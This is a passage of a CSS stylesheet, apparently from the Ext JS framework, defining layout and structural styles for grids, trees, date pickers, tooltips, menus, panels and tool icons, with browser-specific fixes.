overflow: hidden;
position: absolute;
top: 2px;
width: 6px;
z-index: 3;
}
/* Column Reorder DD */
.x-dd-drag-proxy .x-grid3-hd-inner{
background: repeat-x left bottom;
width:120px;
padding:3px;
border:1px solid;
overflow:hidden;
}
.col-move-top, .col-move-bottom{
width:9px;
height:9px;
position:absolute;
top:0;
line-height:1px;
font-size:1px;
overflow:hidden;
visibility:hidden;
z-index:20000;
background:transparent no-repeat left top;
}
/* Selection Styles */
.x-grid3-row-selected {
border:1px dotted;
}
.x-grid3-locked td.x-grid3-row-marker, .x-grid3-locked .x-grid3-row-selected td.x-grid3-row-marker{
background: repeat-x 0 bottom !important;
vertical-align:middle !important;
padding:0;
border-top:1px solid;
border-bottom:none !important;
border-right:1px solid !important;
text-align:center;
}
.x-grid3-locked td.x-grid3-row-marker div, .x-grid3-locked .x-grid3-row-selected td.x-grid3-row-marker div{
padding:0 4px;
text-align:center;
}
/* dirty cells */
.x-grid3-dirty-cell {
background: transparent no-repeat 0 0;
}
/* Grid Toolbars */
.x-grid3-topbar, .x-grid3-bottombar{
overflow:hidden;
display:none;
zoom:1;
position:relative;
}
.x-grid3-topbar .x-toolbar{
border-right:0 none;
}
.x-grid3-bottombar .x-toolbar{
border-right:0 none;
border-bottom:0 none;
border-top:1px solid;
}
/* Props Grid Styles */
.x-props-grid .x-grid3-cell{
padding:1px;
}
.x-props-grid .x-grid3-td-name .x-grid3-cell-inner{
background:transparent repeat-y -16px !important;
padding-left:12px;
}
.x-props-grid .x-grid3-body .x-grid3-td-name{
padding:1px;
padding-right:0;
border:0 none;
border-right:1px solid;
}
/* dd */
.x-grid3-col-dd {
border:0 none;
padding:0;
background-color:transparent;
}
.x-dd-drag-ghost .x-grid3-dd-wrap {
padding:1px 3px 3px 1px;
}
.x-grid3-hd {
-moz-user-select:none;
-khtml-user-select:none;
-webkit-user-select:ignore;
}
.x-grid3-hd-btn {
display:none;
position:absolute;
width:14px;
background:no-repeat left center;
right:0;
top:0;
z-index:2;
cursor:pointer;
}
.x-grid3-hd-over .x-grid3-hd-btn, .x-grid3-hd-menu-open .x-grid3-hd-btn {
display:block;
}
a.x-grid3-hd-btn:hover {
background-position:-14px center;
}
/* Expanders */
.x-grid3-body .x-grid3-td-expander {
background:transparent repeat-y right;
}
.x-grid3-body .x-grid3-td-expander .x-grid3-cell-inner {
padding:0 !important;
height:100%;
}
.x-grid3-row-expander {
width:100%;
height:18px;
background-position:4px 2px;
background-repeat:no-repeat;
background-color:transparent;
}
.x-grid3-row-collapsed .x-grid3-row-expander {
background-position:4px 2px;
}
.x-grid3-row-expanded .x-grid3-row-expander {
background-position:-21px 2px;
}
.x-grid3-row-collapsed .x-grid3-row-body {
display:none !important;
}
.x-grid3-row-expanded .x-grid3-row-body {
display:block !important;
}
/* Checkers */
.x-grid3-body .x-grid3-td-checker {
background:transparent repeat-y right;
}
.x-grid3-body .x-grid3-td-checker .x-grid3-cell-inner, .x-grid3-header .x-grid3-td-checker .x-grid3-hd-inner {
padding:0 !important;
height:100%;
}
.x-grid3-row-checker, .x-grid3-hd-checker {
width:100%;
height:18px;
background-position:2px 2px;
background-repeat:no-repeat;
background-color:transparent;
}
.x-grid3-row .x-grid3-row-checker {
background-position:2px 2px;
}
.x-grid3-row-selected .x-grid3-row-checker, .x-grid3-hd-checker-on .x-grid3-hd-checker,.x-grid3-row-checked .x-grid3-row-checker {
background-position:-23px 2px;
}
.x-grid3-hd-checker {
background-position:2px 1px;
}
.ext-border-box .x-grid3-hd-checker {
background-position:2px 3px;
}
.x-grid3-hd-checker-on .x-grid3-hd-checker {
background-position:-23px 1px;
}
.ext-border-box .x-grid3-hd-checker-on .x-grid3-hd-checker {
background-position:-23px 3px;
}
/* Numberer */
.x-grid3-body .x-grid3-td-numberer {
background:transparent repeat-y right;
}
.x-grid3-body .x-grid3-td-numberer .x-grid3-cell-inner {
padding:3px 5px 0 0 !important;
text-align:right;
}
/* Row Icon */
.x-grid3-body .x-grid3-td-row-icon {
background:transparent repeat-y right;
vertical-align:top;
text-align:center;
}
.x-grid3-body .x-grid3-td-row-icon .x-grid3-cell-inner {
padding:0 !important;
background-position:center center;
background-repeat:no-repeat;
width:16px;
height:16px;
margin-left:2px;
margin-top:3px;
}
/* All specials */
.x-grid3-body .x-grid3-row-selected .x-grid3-td-numberer,
.x-grid3-body .x-grid3-row-selected .x-grid3-td-checker,
.x-grid3-body .x-grid3-row-selected .x-grid3-td-expander {
background:transparent repeat-y right;
}
.x-grid3-body .x-grid3-check-col-td .x-grid3-cell-inner {
padding: 1px 0 0 0 !important;
}
.x-grid3-check-col {
width:100%;
height:16px;
background-position:center center;
background-repeat:no-repeat;
background-color:transparent;
}
.x-grid3-check-col-on {
width:100%;
height:16px;
background-position:center center;
background-repeat:no-repeat;
background-color:transparent;
}
/* Grouping classes */
.x-grid-group, .x-grid-group-body, .x-grid-group-hd {
zoom:1;
}
.x-grid-group-hd {
border-bottom: 2px solid;
cursor:pointer;
padding-top:6px;
}
.x-grid-group-hd div.x-grid-group-title {
background:transparent no-repeat 3px 3px;
padding:4px 4px 4px 17px;
}
.x-grid-group-collapsed .x-grid-group-body {
display:none;
}
.ext-ie6 .x-grid3 .x-editor .x-form-text, .ext-ie7 .x-grid3 .x-editor .x-form-text {
position:relative;
top:-1px;
}
.ext-ie .x-props-grid .x-editor .x-form-text {
position:static;
top:0;
}
.x-grid-empty {
padding:10px;
}
/* fix floating toolbar issue */
.ext-ie7 .x-grid-panel .x-panel-bbar {
position:relative;
}
/* Reset position to static when Grid Panel has been framed */
/* to resolve 'snapping' from top to bottom behavior. */
/* @forumThread 86656 */
.ext-ie7 .x-grid-panel .x-panel-mc .x-panel-bbar {
position: static;
}
.ext-ie6 .x-grid3-header {
position: relative;
}
/* Fix WebKit bug in Grids */
.ext-webkit .x-grid-panel .x-panel-bwrap{
-webkit-user-select:none;
}
.ext-webkit .x-tbar-page-number{
-webkit-user-select:ignore;
}
/* end*/
/* column lines */
.x-grid-with-col-lines .x-grid3-row td.x-grid3-cell {
padding-right:0;
border-right:1px solid;
}
.x-pivotgrid .x-grid3-header-offset table {
width: 100%;
border-collapse: collapse;
}
.x-pivotgrid .x-grid3-header-offset table td {
padding: 4px 3px 4px 5px;
text-align: center;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
font-size: 11px;
line-height: 13px;
font-family: tahoma;
}
.x-pivotgrid .x-grid3-row-headers {
display: block;
float: left;
}
.x-pivotgrid .x-grid3-row-headers table {
height: 100%;
width: 100%;
border-collapse: collapse;
}
.x-pivotgrid .x-grid3-row-headers table td {
height: 18px;
padding: 2px 7px 0 0;
text-align: right;
text-overflow: ellipsis;
font-size: 11px;
font-family: tahoma;
}
.ext-gecko .x-pivotgrid .x-grid3-row-headers table td {
height: 21px;
}
.x-grid3-header-title {
top: 0%;
left: 0%;
position: absolute;
text-align: center;
vertical-align: middle;
font-family: tahoma;
font-size: 11px;
padding: auto 1px;
display: table-cell;
}
.x-grid3-header-title span {
position: absolute;
top: 50%;
left: 0%;
width: 100%;
margin-top: -6px;
}.x-dd-drag-proxy{
position:absolute;
left:0;
top:0;
visibility:hidden;
z-index:15000;
}
.x-dd-drag-ghost{
-moz-opacity: 0.85;
opacity:.85;
filter: alpha(opacity=85);
border: 1px solid;
padding:3px;
padding-left:20px;
white-space:nowrap;
}
.x-dd-drag-repair .x-dd-drag-ghost{
-moz-opacity: 0.4;
opacity:.4;
filter: alpha(opacity=40);
border:0 none;
padding:0;
background-color:transparent;
}
.x-dd-drag-repair .x-dd-drop-icon{
visibility:hidden;
}
.x-dd-drop-icon{
position:absolute;
top:3px;
left:3px;
display:block;
width:16px;
height:16px;
background-color:transparent;
background-position: center;
background-repeat: no-repeat;
z-index:1;
}
.x-view-selector {
position:absolute;
left:0;
top:0;
width:0;
border:1px dotted;
opacity: .5;
-moz-opacity: .5;
filter:alpha(opacity=50);
zoom:1;
}.ext-strict .ext-ie .x-tree .x-panel-bwrap{
position:relative;
overflow:hidden;
}
.x-tree-icon, .x-tree-ec-icon, .x-tree-elbow-line, .x-tree-elbow, .x-tree-elbow-end, .x-tree-elbow-plus, .x-tree-elbow-minus, .x-tree-elbow-end-plus, .x-tree-elbow-end-minus{
border: 0 none;
height: 18px;
margin: 0;
padding: 0;
vertical-align: top;
width: 16px;
background-repeat: no-repeat;
}
.x-tree-node-collapsed .x-tree-node-icon, .x-tree-node-expanded .x-tree-node-icon, .x-tree-node-leaf .x-tree-node-icon{
border: 0 none;
height: 18px;
margin: 0;
padding: 0;
vertical-align: top;
width: 16px;
background-position:center;
background-repeat: no-repeat;
}
.ext-ie .x-tree-node-indent img, .ext-ie .x-tree-node-icon, .ext-ie .x-tree-ec-icon {
vertical-align: middle !important;
}
.ext-strict .ext-ie8 .x-tree-node-indent img, .ext-strict .ext-ie8 .x-tree-node-icon, .ext-strict .ext-ie8 .x-tree-ec-icon {
vertical-align: top !important;
}
/* checkboxes */
input.x-tree-node-cb {
margin-left:1px;
height: 19px;
vertical-align: bottom;
}
.ext-ie input.x-tree-node-cb {
margin-left:0;
margin-top: 1px;
width: 16px;
height: 16px;
vertical-align: middle;
}
.ext-strict .ext-ie8 input.x-tree-node-cb{
margin: 1px 1px;
height: 14px;
vertical-align: bottom;
}
.ext-strict .ext-ie8 input.x-tree-node-cb + a{
vertical-align: bottom;
}
.ext-opera input.x-tree-node-cb {
height: 14px;
vertical-align: middle;
}
.x-tree-noicon .x-tree-node-icon{
width:0; height:0;
}
/* No line styles */
.x-tree-no-lines .x-tree-elbow{
background-color:transparent;
}
.x-tree-no-lines .x-tree-elbow-end{
background-color:transparent;
}
.x-tree-no-lines .x-tree-elbow-line{
background-color:transparent;
}
/* Arrows */
.x-tree-arrows .x-tree-elbow{
background-color:transparent;
}
.x-tree-arrows .x-tree-elbow-plus{
background:transparent no-repeat 0 0;
}
.x-tree-arrows .x-tree-elbow-minus{
background:transparent no-repeat -16px 0;
}
.x-tree-arrows .x-tree-elbow-end{
background-color:transparent;
}
.x-tree-arrows .x-tree-elbow-end-plus{
background:transparent no-repeat 0 0;
}
.x-tree-arrows .x-tree-elbow-end-minus{
background:transparent no-repeat -16px 0;
}
.x-tree-arrows .x-tree-elbow-line{
background-color:transparent;
}
.x-tree-arrows .x-tree-ec-over .x-tree-elbow-plus{
background-position:-32px 0;
}
.x-tree-arrows .x-tree-ec-over .x-tree-elbow-minus{
background-position:-48px 0;
}
.x-tree-arrows .x-tree-ec-over .x-tree-elbow-end-plus{
background-position:-32px 0;
}
.x-tree-arrows .x-tree-ec-over .x-tree-elbow-end-minus{
background-position:-48px 0;
}
.x-tree-elbow-plus, .x-tree-elbow-minus, .x-tree-elbow-end-plus, .x-tree-elbow-end-minus{
cursor:pointer;
}
.ext-ie ul.x-tree-node-ct{
font-size:0;
line-height:0;
zoom:1;
}
.x-tree-node{
white-space: nowrap;
}
.x-tree-node-el {
line-height:18px;
cursor:pointer;
}
.x-tree-node a, .x-dd-drag-ghost a{
text-decoration:none;
-khtml-user-select:none;
-moz-user-select:none;
-webkit-user-select:ignore;
-kthml-user-focus:normal;
-moz-user-focus:normal;
-moz-outline: 0 none;
outline:0 none;
}
.x-tree-node a span, .x-dd-drag-ghost a span{
text-decoration:none;
padding:1px 3px 1px 2px;
}
.x-tree-node .x-tree-node-disabled .x-tree-node-icon{
-moz-opacity: 0.5;
opacity:.5;
filter: alpha(opacity=50);
}
.x-tree-node .x-tree-node-inline-icon{
background-color:transparent;
}
.x-tree-node a:hover, .x-dd-drag-ghost a:hover{
text-decoration:none;
}
.x-tree-node div.x-tree-drag-insert-below{
border-bottom:1px dotted;
}
.x-tree-node div.x-tree-drag-insert-above{
border-top:1px dotted;
}
.x-tree-dd-underline .x-tree-node div.x-tree-drag-insert-below{
border-bottom:0 none;
}
.x-tree-dd-underline .x-tree-node div.x-tree-drag-insert-above{
border-top:0 none;
}
.x-tree-dd-underline .x-tree-node div.x-tree-drag-insert-below a{
border-bottom:2px solid;
}
.x-tree-dd-underline .x-tree-node div.x-tree-drag-insert-above a{
border-top:2px solid;
}
.x-tree-node .x-tree-drag-append a span{
border:1px dotted;
}
.x-dd-drag-ghost .x-tree-node-indent, .x-dd-drag-ghost .x-tree-ec-icon{
display:none !important;
}
/* Fix for ie rootVisible:false issue */
.x-tree-root-ct {
zoom:1;
}
.x-date-picker {
border: 1px solid;
border-top:0 none;
position:relative;
}
.x-date-picker a {
-moz-outline:0 none;
outline:0 none;
}
.x-date-inner, .x-date-inner td, .x-date-inner th{
border-collapse:separate;
}
.x-date-middle,.x-date-left,.x-date-right {
background: repeat-x 0 -83px;
overflow:hidden;
}
.x-date-middle .x-btn-tc,.x-date-middle .x-btn-tl,.x-date-middle .x-btn-tr,
.x-date-middle .x-btn-mc,.x-date-middle .x-btn-ml,.x-date-middle .x-btn-mr,
.x-date-middle .x-btn-bc,.x-date-middle .x-btn-bl,.x-date-middle .x-btn-br{
background:transparent !important;
vertical-align:middle;
}
.x-date-middle .x-btn-mc em.x-btn-arrow {
background:transparent no-repeat right 0;
}
.x-date-right, .x-date-left {
width:18px;
}
.x-date-right{
text-align:right;
}
.x-date-middle {
padding-top:2px;
padding-bottom:2px;
width:130px; /* FF3 */
}
.x-date-right a, .x-date-left a{
display:block;
width:16px;
height:16px;
background-position: center;
background-repeat: no-repeat;
cursor:pointer;
-moz-opacity: 0.6;
opacity:.6;
filter: alpha(opacity=60);
}
.x-date-right a:hover, .x-date-left a:hover{
-moz-opacity: 1;
opacity:1;
filter: alpha(opacity=100);
}
.x-item-disabled .x-date-right a:hover, .x-item-disabled .x-date-left a:hover{
-moz-opacity: 0.6;
opacity:.6;
filter: alpha(opacity=60);
}
.x-date-right a {
margin-right:2px;
text-decoration:none !important;
}
.x-date-left a{
margin-left:2px;
text-decoration:none !important;
}
table.x-date-inner {
width: 100%;
table-layout:fixed;
}
.ext-webkit table.x-date-inner{
/* Fix for webkit browsers */
width: 175px;
}
.x-date-inner th {
width:25px;
}
.x-date-inner th {
background: repeat-x left top;
text-align:right !important;
border-bottom: 1px solid;
cursor:default;
padding:0;
border-collapse:separate;
}
.x-date-inner th span {
display:block;
padding:2px;
padding-right:7px;
}
.x-date-inner td {
border: 1px solid;
text-align:right;
padding:0;
}
.x-date-inner a {
padding:2px 5px;
display:block;
text-decoration:none;
text-align:right;
zoom:1;
}
.x-date-inner .x-date-active{
cursor:pointer;
color:black;
}
.x-date-inner .x-date-selected a{
background: repeat-x left top;
border:1px solid;
padding:1px 4px;
}
.x-date-inner .x-date-today a{
border: 1px solid;
padding:1px 4px;
}
.x-date-inner .x-date-prevday a,.x-date-inner .x-date-nextday a {
text-decoration:none !important;
}
.x-date-bottom {
padding:4px;
border-top: 1px solid;
background: repeat-x left top;
}
.x-date-inner a:hover, .x-date-inner .x-date-disabled a:hover{
text-decoration:none !important;
}
.x-item-disabled .x-date-inner a:hover{
background: none;
}
.x-date-inner .x-date-disabled a {
cursor:default;
}
.x-date-menu .x-menu-item {
padding:1px 24px 1px 4px;
white-space: nowrap;
}
.x-date-menu .x-menu-item .x-menu-item-icon {
width:10px;
height:10px;
margin-right:5px;
background-position:center -4px !important;
}
.x-date-mp {
position:absolute;
left:0;
top:0;
display:none;
}
.x-date-mp td {
padding:2px;
font:normal 11px arial, helvetica,tahoma,sans-serif;
}
td.x-date-mp-month,td.x-date-mp-year,td.x-date-mp-ybtn {
border: 0 none;
text-align:center;
vertical-align: middle;
width:25%;
}
.x-date-mp-ok {
margin-right:3px;
}
.x-date-mp-btns button {
text-decoration:none;
text-align:center;
text-decoration:none !important;
border:1px solid;
padding:1px 3px 1px;
cursor:pointer;
}
.x-date-mp-btns {
background: repeat-x left top;
}
.x-date-mp-btns td {
border-top: 1px solid;
text-align:center;
}
td.x-date-mp-month a,td.x-date-mp-year a {
display:block;
padding:2px 4px;
text-decoration:none;
text-align:center;
}
td.x-date-mp-month a:hover,td.x-date-mp-year a:hover {
text-decoration:none;
cursor:pointer;
}
td.x-date-mp-sel a {
padding:1px 3px;
background: repeat-x left top;
border:1px solid;
}
.x-date-mp-ybtn a {
overflow:hidden;
width:15px;
height:15px;
cursor:pointer;
background:transparent no-repeat;
display:block;
margin:0 auto;
}
.x-date-mp-ybtn a.x-date-mp-next {
background-position:0 -120px;
}
.x-date-mp-ybtn a.x-date-mp-next:hover {
background-position:-15px -120px;
}
.x-date-mp-ybtn a.x-date-mp-prev {
background-position:0 -105px;
}
.x-date-mp-ybtn a.x-date-mp-prev:hover {
background-position:-15px -105px;
}
.x-date-mp-ybtn {
text-align:center;
}
td.x-date-mp-sep {
border-right:1px solid;
}.x-tip{
position: absolute;
top: 0;
left:0;
visibility: hidden;
z-index: 20002;
border:0 none;
}
.x-tip .x-tip-close{
height: 15px;
float:right;
width: 15px;
margin:0 0 2px 2px;
cursor:pointer;
display:none;
}
.x-tip .x-tip-tc {
background: transparent no-repeat 0 -62px;
padding-top:3px;
overflow:hidden;
zoom:1;
}
.x-tip .x-tip-tl {
background: transparent no-repeat 0 0;
padding-left:6px;
overflow:hidden;
zoom:1;
}
.x-tip .x-tip-tr {
background: transparent no-repeat right 0;
padding-right:6px;
overflow:hidden;
zoom:1;
}
.x-tip .x-tip-bc {
background: transparent no-repeat 0 -121px;
height:3px;
overflow:hidden;
}
.x-tip .x-tip-bl {
background: transparent no-repeat 0 -59px;
padding-left:6px;
zoom:1;
}
.x-tip .x-tip-br {
background: transparent no-repeat right -59px;
padding-right:6px;
zoom:1;
}
.x-tip .x-tip-mc {
border:0 none;
}
.x-tip .x-tip-ml {
background: no-repeat 0 -124px;
padding-left:6px;
zoom:1;
}
.x-tip .x-tip-mr {
background: transparent no-repeat right -124px;
padding-right:6px;
zoom:1;
}
.ext-ie .x-tip .x-tip-header,.ext-ie .x-tip .x-tip-tc {
font-size:0;
line-height:0;
}
.ext-border-box .x-tip .x-tip-header, .ext-border-box .x-tip .x-tip-tc{
line-height: 1px;
}
.x-tip .x-tip-header-text {
padding:0;
margin:0 0 2px 0;
}
.x-tip .x-tip-body {
margin:0 !important;
line-height:14px;
padding:0;
}
.x-tip .x-tip-body .loading-indicator {
margin:0;
}
.x-tip-draggable .x-tip-header,.x-tip-draggable .x-tip-header-text {
cursor:move;
}
.x-form-invalid-tip .x-tip-tc {
background: repeat-x 0 -12px;
padding-top:6px;
}
.x-form-invalid-tip .x-tip-bc {
background: repeat-x 0 -18px;
height:6px;
}
.x-form-invalid-tip .x-tip-bl {
background: no-repeat 0 -6px;
}
.x-form-invalid-tip .x-tip-br {
background: no-repeat right -6px;
}
.x-form-invalid-tip .x-tip-body {
padding:2px;
}
.x-form-invalid-tip .x-tip-body {
padding-left:24px;
background:transparent no-repeat 2px 2px;
}
.x-tip-anchor {
position: absolute;
width: 9px;
height: 10px;
overflow:hidden;
background: transparent no-repeat 0 0;
zoom:1;
}
.x-tip-anchor-bottom {
background-position: -9px 0;
}
.x-tip-anchor-right {
background-position: -18px 0;
width: 10px;
}
.x-tip-anchor-left {
background-position: -28px 0;
width: 10px;
}.x-menu {
z-index: 15000;
zoom: 1;
background: repeat-y;
}
.x-menu-floating{
border: 1px solid;
}
.x-menu a {
text-decoration: none !important;
}
.ext-ie .x-menu {
zoom:1;
overflow:hidden;
}
.x-menu-list{
padding: 2px;
background-color:transparent;
border:0 none;
overflow:hidden;
overflow-y: hidden;
}
.ext-strict .ext-ie .x-menu-list{
position: relative;
}
.x-menu li{
line-height:100%;
}
.x-menu li.x-menu-sep-li{
font-size:1px;
line-height:1px;
}
.x-menu-list-item{
white-space: nowrap;
display:block;
padding:1px;
}
.x-menu-item{
-moz-user-select: none;
-khtml-user-select:none;
-webkit-user-select:ignore;
}
.x-menu-item-arrow{
background:transparent no-repeat right;
}
.x-menu-sep {
display:block;
font-size:1px;
line-height:1px;
margin: 2px 3px;
border-bottom:1px solid;
overflow:hidden;
}
.x-menu-focus {
position:absolute;
left:-1px;
top:-1px;
width:1px;
height:1px;
line-height:1px;
font-size:1px;
-moz-outline:0 none;
outline:0 none;
-moz-user-select: none;
-khtml-user-select:none;
-webkit-user-select:ignore;
overflow:hidden;
display:block;
}
a.x-menu-item {
cursor: pointer;
display: block;
line-height: 16px;
outline-color: -moz-use-text-color;
outline-style: none;
outline-width: 0;
padding: 3px 21px 3px 27px;
position: relative;
text-decoration: none;
white-space: nowrap;
}
.x-menu-item-active {
background-repeat: repeat-x;
background-position: left bottom;
border-style:solid;
border-width: 1px 0;
margin:0 1px;
padding: 0;
}
.x-menu-item-active a.x-menu-item {
border-style:solid;
border-width:0 1px;
margin:0 -1px;
}
.x-menu-item-icon {
border: 0 none;
height: 16px;
padding: 0;
vertical-align: top;
width: 16px;
position: absolute;
left: 3px;
top: 3px;
margin: 0;
background-position:center;
}
.ext-ie .x-menu-item-icon {
left: -24px;
}
.ext-strict .x-menu-item-icon {
left: 3px;
}
.ext-ie6 .x-menu-item-icon {
left: -24px;
}
.ext-ie .x-menu-item-icon {
vertical-align: middle;
}
.x-menu-check-item .x-menu-item-icon{
background: transparent no-repeat center;
}
.x-menu-group-item .x-menu-item-icon{
background-color: transparent;
}
.x-menu-item-checked .x-menu-group-item .x-menu-item-icon{
background: transparent no-repeat center;
}
.x-date-menu .x-menu-list{
padding: 0;
}
.x-menu-date-item{
padding:0;
}
.x-menu .x-color-palette, .x-menu .x-date-picker{
margin-left: 26px;
margin-right:4px;
}
.x-menu .x-date-picker{
border:1px solid;
margin-top:2px;
margin-bottom:2px;
}
.x-menu-plain .x-color-palette, .x-menu-plain .x-date-picker{
margin: 0;
border: 0 none;
}
.x-date-menu {
padding:0 !important;
}
/*
* fixes separator visibility problem in IE 6
*/
.ext-strict .ext-ie6 .x-menu-sep-li {
padding: 3px 4px;
}
.ext-strict .ext-ie6 .x-menu-sep {
margin: 0;
height: 1px;
}
/*
* Fixes an issue with "fat" separators in webkit
*/
.ext-webkit .x-menu-sep{
height: 1px;
}
/*
* Ugly mess to remove the white border under the picker
*/
.ext-ie .x-date-menu{
height: 199px;
}
.ext-strict .ext-ie .x-date-menu, .ext-border-box .ext-ie8 .x-date-menu{
height: 197px;
}
.ext-strict .ext-ie7 .x-date-menu{
height: 195px;
}
.ext-strict .ext-ie8 .x-date-menu{
height: auto;
}
.x-cycle-menu .x-menu-item-checked {
border:1px dotted !important;
padding:0;
}
.x-menu .x-menu-scroller {
width: 100%;
background-repeat:no-repeat;
background-position:center;
height:8px;
line-height: 8px;
cursor:pointer;
margin: 0;
padding: 0;
}
.x-menu .x-menu-scroller-active{
height: 6px;
line-height: 6px;
}
.x-menu-list-item-indent{
padding-left: 27px;
}/*
Creates rounded, raised boxes like on the Ext website - the markup isn't pretty:
<div class="x-box-blue">
<div class="x-box-tl"><div class="x-box-tr"><div class="x-box-tc"></div></div></div>
<div class="x-box-ml"><div class="x-box-mr"><div class="x-box-mc">
<h3>YOUR TITLE HERE (optional)</h3>
<div>YOUR CONTENT HERE</div>
</div></div></div>
<div class="x-box-bl"><div class="x-box-br"><div class="x-box-bc"></div></div></div>
</div>
*/
.x-box-tl {
background: transparent no-repeat 0 0;
zoom:1;
}
.x-box-tc {
height: 8px;
background: transparent repeat-x 0 0;
overflow: hidden;
}
.x-box-tr {
background: transparent no-repeat right -8px;
}
.x-box-ml {
background: transparent repeat-y 0;
padding-left: 4px;
overflow: hidden;
zoom:1;
}
.x-box-mc {
background: repeat-x 0 -16px;
padding: 4px 10px;
}
.x-box-mc h3 {
margin: 0 0 4px 0;
zoom:1;
}
.x-box-mr {
background: transparent repeat-y right;
padding-right: 4px;
overflow: hidden;
}
.x-box-bl {
background: transparent no-repeat 0 -16px;
zoom:1;
}
.x-box-bc {
background: transparent repeat-x 0 -8px;
height: 8px;
overflow: hidden;
}
.x-box-br {
background: transparent no-repeat right -24px;
}
.x-box-tl, .x-box-bl {
padding-left: 8px;
overflow: hidden;
}
.x-box-tr, .x-box-br {
padding-right: 8px;
overflow: hidden;
}.x-combo-list {
border:1px solid;
zoom:1;
overflow:hidden;
}
.x-combo-list-inner {
overflow:auto;
position:relative; /* for calculating scroll offsets */
zoom:1;
overflow-x:hidden;
}
.x-combo-list-hd {
border-bottom:1px solid;
padding:3px;
}
.x-resizable-pinned .x-combo-list-inner {
border-bottom:1px solid;
}
.x-combo-list-item {
padding:2px;
border:1px solid;
white-space: nowrap;
overflow:hidden;
text-overflow: ellipsis;
}
.x-combo-list .x-combo-selected{
border:1px dotted !important;
cursor:pointer;
}
.x-combo-list .x-toolbar {
border-top:1px solid;
border-bottom:0 none;
}.x-panel {
border-style: solid;
border-width:0;
}
.x-panel-header {
overflow:hidden;
zoom:1;
padding:5px 3px 4px 5px;
border:1px solid;
line-height: 15px;
background: transparent repeat-x 0 -1px;
}
.x-panel-body {
border:1px solid;
border-top:0 none;
overflow:hidden;
position: relative; /* added for item scroll positioning */
}
.x-panel-bbar .x-toolbar, .x-panel-tbar .x-toolbar {
border:1px solid;
border-top:0 none;
overflow:hidden;
padding:2px;
}
.x-panel-tbar-noheader .x-toolbar, .x-panel-mc .x-panel-tbar .x-toolbar {
border-top:1px solid;
border-bottom: 0 none;
}
.x-panel-body-noheader, .x-panel-mc .x-panel-body {
border-top:1px solid;
}
.x-panel-header {
overflow:hidden;
zoom:1;
}
.x-panel-tl .x-panel-header {
padding:5px 0 4px 0;
border:0 none;
background:transparent no-repeat;
}
.x-panel-tl .x-panel-icon, .x-window-tl .x-panel-icon {
padding-left:20px !important;
background-repeat:no-repeat;
background-position:0 4px;
zoom:1;
}
.x-panel-inline-icon {
width:16px;
height:16px;
background-repeat:no-repeat;
background-position:0 0;
vertical-align:middle;
margin-right:4px;
margin-top:-1px;
margin-bottom:-1px;
}
.x-panel-tc {
background: transparent repeat-x 0 0;
overflow:hidden;
}
/* fix ie7 strict mode bug */
.ext-strict .ext-ie7 .x-panel-tc {
overflow: visible;
}
.x-panel-tl {
background: transparent no-repeat 0 0;
padding-left:6px;
zoom:1;
border-bottom:1px solid;
}
.x-panel-tr {
background: transparent no-repeat right 0;
zoom:1;
padding-right:6px;
}
.x-panel-bc {
background: transparent repeat-x 0 bottom;
zoom:1;
}
.x-panel-bc .x-panel-footer {
zoom:1;
}
.x-panel-bl {
background: transparent no-repeat 0 bottom;
padding-left:6px;
zoom:1;
}
.x-panel-br {
background: transparent no-repeat right bottom;
padding-right:6px;
zoom:1;
}
.x-panel-mc {
border:0 none;
padding:0;
margin:0;
padding-top:6px;
}
.x-panel-mc .x-panel-body {
background-color:transparent;
border: 0 none;
}
.x-panel-ml {
background: repeat-y 0 0;
padding-left:6px;
zoom:1;
}
.x-panel-mr {
background: transparent repeat-y right 0;
padding-right:6px;
zoom:1;
}
.x-panel-bc .x-panel-footer {
padding-bottom:6px;
}
.x-panel-nofooter .x-panel-bc, .x-panel-nofooter .x-window-bc {
height:6px;
font-size:0;
line-height:0;
}
.x-panel-bwrap {
overflow:hidden;
zoom:1;
left:0;
top:0;
}
.x-panel-body {
overflow:hidden;
zoom:1;
}
.x-panel-collapsed .x-resizable-handle{
display:none;
}
.ext-gecko .x-panel-animated div {
overflow:hidden !important;
}
/* Plain */
.x-plain-body {
overflow:hidden;
}
.x-plain-bbar .x-toolbar {
overflow:hidden;
padding:2px;
}
.x-plain-tbar .x-toolbar {
overflow:hidden;
padding:2px;
}
.x-plain-bwrap {
overflow:hidden;
zoom:1;
}
.x-plain {
overflow:hidden;
}
/* Tools */
.x-tool {
overflow:hidden;
width:15px;
height:15px;
float:right;
cursor:pointer;
background:transparent no-repeat;
margin-left:2px;
}
/* expand / collapse tools */
.x-tool-toggle {
background-position:0 -60px;
}
.x-tool-toggle-over {
background-position:-15px -60px;
}
.x-panel-collapsed .x-tool-toggle {
background-position:0 -75px;
}
.x-panel-collapsed .x-tool-toggle-over {
background-position:-15px -75px;
}
.x-tool-close {
background-position:0 -0;
}
.x-tool-close-over {
background-position:-15px 0;
}
.x-tool-minimize {
background-position:0 -15px;
}
.x-tool-minimize-over {
background-position:-15px -15px;
}
.x-tool-maximize {
background-position:0 -30px;
}
.x-tool-maximize-over {
background-position:-15px -30px;
}
.x-tool-restore {
background-position:0 -45px;
}
.x-tool-restore-over {
background-position:-15px -45px;
}
.x-tool-gear {
background-position:0 -90px;
}
.x-tool-gear-over {
background-position:-15px -90px;
}
.x-tool-prev {
background-position:0 -105px;
}
.x-tool-prev-over {
background-position:-15px -105px;
}
.x-tool-next {
background-position:0 -120px;
}
.x-tool-next-over {
background-position:-15px -120px;
}
.x-tool-pin {
background-position:0 -135px;
}
.x-tool-pin-over {
background-position:-15px -135px;
}
.x-tool-unpin {
background-position:0 -150px;
}
.x-tool-unpin-over {
background-position:-15px -150px;
}
.x-tool-right {
background-position:0 -165px;
}
.x-tool-right-over {
background-position:-15px -165px;
}
.x-tool-left {
background-position:0 -180px;
}
.x-tool-left-over {
background-position:-15px -180px;
}
.x-tool-down {
background-position:0 -195px;
}
.x-tool-down-over {
background-position:-15px -195px;
}
.x-tool-up {
background-position:0 -210px;
}
.x-tool-up-over {
background-position:-15px -210px;
}
.x-tool-refresh {
background-position:0 -225px;
}
.x-tool-refresh-over {
background-position:-15px -225px;
}
.x-tool-plus {
background-position:0 -240px;
}
.x-tool-plus-over {
background-position:-15px -240px;
}
.x-tool-minus {
background-position:0 -255px;
}
.x-tool-minus-over {
background-position:-15px -255px;
}
.x-tool-search {
background-position:0 -270px;
}
.x-tool-search-over {
background-position:-15px -270px;
}
.x-tool-save {
background-position:0 -285px;
}
.x-tool-save-over {
background-position:-15px -285px;
}
.x-tool-help {
background-position:0 -300px;
}
.x-tool-help-over {
background-position:-15px -300px;
}
.x-tool-print {
background-position:0 -315px;
}
